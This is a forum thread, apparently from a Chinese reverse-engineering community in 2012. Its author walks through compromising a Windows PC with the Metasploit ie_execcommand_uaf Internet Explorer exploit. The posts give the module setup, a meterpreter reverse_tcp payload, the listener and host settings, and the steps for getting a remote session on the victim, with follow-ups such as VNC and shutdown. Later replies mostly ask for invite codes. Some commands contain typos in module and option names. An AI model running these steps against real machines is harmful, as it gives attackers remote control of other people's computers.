首页
社区
课程
招聘
[旧帖] [原创]利用IE赤鬼漏洞入侵PC 0.00雪花
发表于: 2012-10-1 17:37 3501

[旧帖] [原创]利用IE赤鬼漏洞入侵PC 0.00雪花

2012-10-1 17:37
3501

大家应该也都看到了最近IE爆出赤鬼漏洞,但是一般论坛都是在说明这个漏洞 没有这个漏洞的演示方法
下面就给大家演示下如何利用ie_execcommand_uaf 入侵 计算机


[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

收藏
免费 6
支持
分享
最新回复 (14)
雪    币: 262
活跃值: (193)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
这里我们要用到msf 就是Metasploit Framework
由于是ruby 编写的 先要安装ruby
在终端输入apt-get install ruby  图片穿不上来 大家见谅
要把msf升级到最近数据库才能利用这个漏洞 但是 无奈我试过升级 还是不能利用
我们先到www.metasploit.com下载我们要用的ie_execcommand_uaf.rb文件
然后移动到我们安装好的msf exploit 利用目录/opt/metasploit-4.4.0/msf3/modules/exploits/windows/browser
在terminal输入mv ie_execcommand_uaf /opt/metasploit-4.4.0/msf3/modules/exploits/windows/browser/
然后我们就可以利用这个漏洞了
2012-10-1 17:43
0
雪    币: 262
活跃值: (193)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
3
不能上传图片好无奈哦  不过 我们继续操作
下面就是连接msf
在terminal输入:msfconsole
连接成功后会显示exploits auxiliary payloads 的数量
然后我们可以利用这个漏洞了
在terminal输入:use exploit/windows/browser/ie_execcommand_usf
下面是设置PAYLOAD文件夹:set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ie_execcommand_uaf) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ie_execcommand_uaf) > show options

Module options (exploit/windows/browser/ie_execcommand_uaf):

Name Current Setting Required Description
---- --------------- -------- -----------
OBFUSCATE false no Enable JavaScript obfuscation
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process, none
LHOST yes The listen address
LPORT 4444 yes The listen port

Exploit target:

Id Name
-- ----
0 Automatic
2012-10-1 17:47
0
雪    币: 262
活跃值: (193)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
4
Required 显示yes的项目都是我们要设置的
set SRVHOST 192.168.223.134
set SRVPORT 80(设定端口)
set URIPATH /(设定下目录)
然后是
set LHOST 192.168.223.134
set HPORT 5555(这个改一下)
这样我们就设定好了 我是在虚拟机测试的
2012-10-1 17:49
0
雪    币: 262
活跃值: (193)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
5
然后我们直接在terminal输入:exploit  这时候会给我们一个url地址:http://192.168.223.134:80/
然后我们打开另外一台虚拟机 在IE中输入这个地址 这里要说明一下 这个漏洞影响的版本是IE6-7几乎IE所有的版本 我另外一台虚拟机使用的是IE7
这个时候我们terminal就会返回一些数据:最后会显示 Successfully migrated to process
也就是我们测试成功了
然后sessions 查看下任务
sessions -i 1 连接一下
这个时候另外一台电脑的权限就拿到了 我们可以做很多事情 比如说:run vnc 或者shutdown 等等
2012-10-1 17:54
0
雪    币: 262
活跃值: (193)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
6
我知道这帖子的内容 很基本 但是 能力有限 而且没什么素材 写不出什么好的文章  
不过恳请管理员大大发放一个邀请码  真心想在看雪交流学习
2012-10-1 17:57
0
雪    币: 262
活跃值: (193)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
7
求邀请码
2012-10-2 16:00
0
雪    币: 15
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
8
求邀请码啊。哎……
2012-10-2 16:50
0
雪    币: 7
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
9
学习了   学习了  谢谢 谢谢
2012-10-2 17:10
0
雪    币: 262
活跃值: (193)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
10
客气了 为了邀请码   我也是说想深入了解一下破解逆向方面的知识
2012-10-2 19:58
0
雪    币: 47147
活跃值: (20480)
能力值: (RANK:350 )
在线值:
发帖
回帖
粉丝
11
己设置你为初级会员。
图片上传请参考:http://bbs.pediy.com/showpost.php?postid=292659
2012-10-2 20:38
0
雪    币: 248
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
12
新手 过来看一下 虽然很多看不懂 。。
2012-10-3 16:41
0
雪    币: 28
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
13
新手看不明白!
2012-10-4 10:53
0
雪    币: 15
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
14
邀请码已发!!
2012-10-9 16:33
0
雪    币: 35
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
15
这个漏洞是针对IE7,8,9的,本人亲自测试可用。顶一下!
2013-9-9 14:32
0
游客
登录 | 注册 方可回帖
返回
//